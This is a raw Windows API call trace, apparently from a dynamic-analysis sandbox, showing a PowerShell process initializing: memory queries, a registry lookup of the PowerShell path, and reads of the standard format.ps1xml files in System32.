	[0397.702] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.702] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.708] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.713] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.713] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.714] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.714] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.714] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.714] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.714] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.714] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.715] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.716] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.716] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.717] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.718] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.720] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.722] VirtualQuery (in: lpAddress=0x26c0a0, lpBuffer=0x26cf60, dwLength=0x30 | out: lpBuffer=0x26cf60*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.722] VirtualQuery (in: lpAddress=0x26c0a0, lpBuffer=0x26cf60, dwLength=0x30 | out: lpBuffer=0x26cf60*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.722] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.723] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.088] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.090] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.091] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.488] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0398.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.488] CoTaskMemFree (pv=0x46a9e0) 
	[0398.491] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.496] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.496] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.496] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.496] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.497] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.497] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.498] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.499] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.499] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d548 | out: phkResult=0x26d548*=0x320) returned 0x0
	[0398.499] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x26d55c, lpData=0x0, lpcbData=0x26d558*=0x0 | out: lpType=0x26d55c*=0x1, lpData=0x0, lpcbData=0x26d558*=0x74) returned 0x0
	[0398.499] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x26d4cc, lpData=0x0, lpcbData=0x26d4c8*=0x0 | out: lpType=0x26d4cc*=0x1, lpData=0x0, lpcbData=0x26d4c8*=0x74) returned 0x0
	[0398.499] CoTaskMemAlloc (cb=0x78) returned 0x4261d0
	[0398.499] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x26d49c, lpData=0x4261d0, lpcbData=0x26d498*=0x74 | out: lpType=0x26d49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d498*=0x74) returned 0x0
	[0398.500] CoTaskMemFree (pv=0x4261d0) 
	[0398.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x26d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0398.500] SetErrorMode (uMode=0x1) returned 0x1
	[0398.500] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x26d420 | out: lpFileInformation=0x26d420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0398.500] SetErrorMode (uMode=0x1) returned 0x1
	[0398.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.501] SetErrorMode (uMode=0x1) returned 0x1
	[0398.501] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d420 | out: lpFileInformation=0x26d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0398.501] SetErrorMode (uMode=0x1) returned 0x1
	[0398.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0398.502] SetErrorMode (uMode=0x1) returned 0x1
	[0398.502] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d420 | out: lpFileInformation=0x26d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0398.502] SetErrorMode (uMode=0x1) returned 0x1
	[0398.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.502] SetErrorMode (uMode=0x1) returned 0x1
	[0398.502] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d420 | out: lpFileInformation=0x26d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0398.502] SetErrorMode (uMode=0x1) returned 0x1
	[0398.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.502] SetErrorMode (uMode=0x1) returned 0x1
	[0398.502] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d420 | out: lpFileInformation=0x26d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0398.503] SetErrorMode (uMode=0x1) returned 0x1
	[0398.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0398.503] SetErrorMode (uMode=0x1) returned 0x1
	[0398.503] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d420 | out: lpFileInformation=0x26d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0398.503] SetErrorMode (uMode=0x1) returned 0x1
	[0398.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0398.503] SetErrorMode (uMode=0x1) returned 0x1
	[0398.503] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d420 | out: lpFileInformation=0x26d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0398.503] SetErrorMode (uMode=0x1) returned 0x1
	[0398.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0398.503] SetErrorMode (uMode=0x1) returned 0x1
	[0398.504] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d420 | out: lpFileInformation=0x26d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0398.504] SetErrorMode (uMode=0x1) returned 0x1
	[0398.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0398.504] SetErrorMode (uMode=0x1) returned 0x1
	[0398.504] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d420 | out: lpFileInformation=0x26d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0398.504] SetErrorMode (uMode=0x1) returned 0x1
	[0398.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0398.504] SetErrorMode (uMode=0x1) returned 0x1
	[0398.504] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d420 | out: lpFileInformation=0x26d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0398.504] SetErrorMode (uMode=0x1) returned 0x1
	[0398.506] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0398.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.506] CoTaskMemFree (pv=0x46a9e0) 
	[0398.508] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0398.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.509] CoTaskMemFree (pv=0x46a9e0) 
	[0398.509] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0398.509] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.509] CoTaskMemFree (pv=0x46a9e0) 
	[0398.509] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0398.509] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.509] CoTaskMemFree (pv=0x46a9e0) 
	[0398.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.510] SetErrorMode (uMode=0x1) returned 0x1
	[0398.510] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0398.510] GetFileType (hFile=0x300) returned 0x1
	[0398.510] SetErrorMode (uMode=0x1) returned 0x1
	[0398.510] GetFileType (hFile=0x300) returned 0x1
	[0398.510] ReadFile (in: hFile=0x300, lpBuffer=0x35af4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35af4c0*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.512] ReadFile (in: hFile=0x300, lpBuffer=0x35af4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35af4c0*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.513] ReadFile (in: hFile=0x300, lpBuffer=0x35af4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35af4c0*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.513] ReadFile (in: hFile=0x300, lpBuffer=0x35af4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35af4c0*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.513] ReadFile (in: hFile=0x300, lpBuffer=0x35af4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35af4c0*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.513] ReadFile (in: hFile=0x300, lpBuffer=0x35af4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35af4c0*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.513] ReadFile (in: hFile=0x300, lpBuffer=0x35af4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35af4c0*, lpNumberOfBytesRead=0x26d0b8*=0x9e2, lpOverlapped=0x0) returned 1
	[0398.514] ReadFile (in: hFile=0x300, lpBuffer=0x35aea0a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35aea0a*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0398.514] ReadFile (in: hFile=0x300, lpBuffer=0x35af4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35af4c0*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0398.514] CloseHandle (hObject=0x300) returned 1
